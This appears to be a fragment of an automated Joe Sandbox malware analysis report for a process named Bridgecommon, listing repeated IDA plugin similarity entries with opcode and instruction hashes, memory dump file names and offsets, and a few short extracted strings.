                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction ID: 0adc029638af732f1c5008ccfe32db8d26f2a395cc251c8000867d32e9d1937a
                                                                                              • Opcode Fuzzy Hash: 0218f1920cd5dc8b9e92e8aa7127dd9017e17d16ca50bd8928d23b5b91b0b709
                                                                                              • Instruction Fuzzy Hash: 3CE0BF6294B7C44FC74B973588A88947F60DE5721178A41EAC145CF6B3E92A8D49C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                              • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                              • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction ID: f7022e37af43f2e05e986e1a0cc446726f3858d82e436fa8ced5b60d6f119fd7
                                                                                              • Opcode Fuzzy Hash: adc8c1cc4189f6213beb4c47a9043b7249ccb8ad43b31e47a810099371ac5710
                                                                                              • Instruction Fuzzy Hash: 46E01A2294E7C04FC70B973588A98547F60AE1721474A40EBC085CF1F3E9299949C711
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction ID: c0e27e007c3273bfcd7392255f06bff471b2acec24bc275eef56d109f6faa75a
                                                                                              • Opcode Fuzzy Hash: 071be711cb797368beb8756d0463c5fa29b116a5dfca29274390be4a16e0f005
                                                                                              • Instruction Fuzzy Hash: FFE04F2194F7C04FC71B973488799547F60EF6721078A40EEC085CF5F3D9199949C702
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                              • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                              • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction ID: a565302b9b7bcc34a1d7b6cb08a6a6e7b8abe4aeb70df905b6acc3b2f1e45e16
                                                                                              • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                                              • Instruction Fuzzy Hash: B4D02230B518040FC70CA738885883433A0EB6A20A78140A8D00AC72F1D92AEC88C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction ID: 3ca3d89b2a44c1ccc83115d2dd53154f4f74bb52458d03ecdb794458fcb23236
                                                                                              • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                                              • Instruction Fuzzy Hash: 87D02230B548040FC70CA63A88588347390EB6A21A7C100A8D00AC72B5E92ADC88C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_57_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: ee4550b84af7779471804bd44f4eca39960630772f8e243641bbcc622fd8accc
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 21C04C05F5B51F01F43577EE54760ACB5409BD5A10FD70372D50D840E19CED22D5815E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000039.00000002.3037888777.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845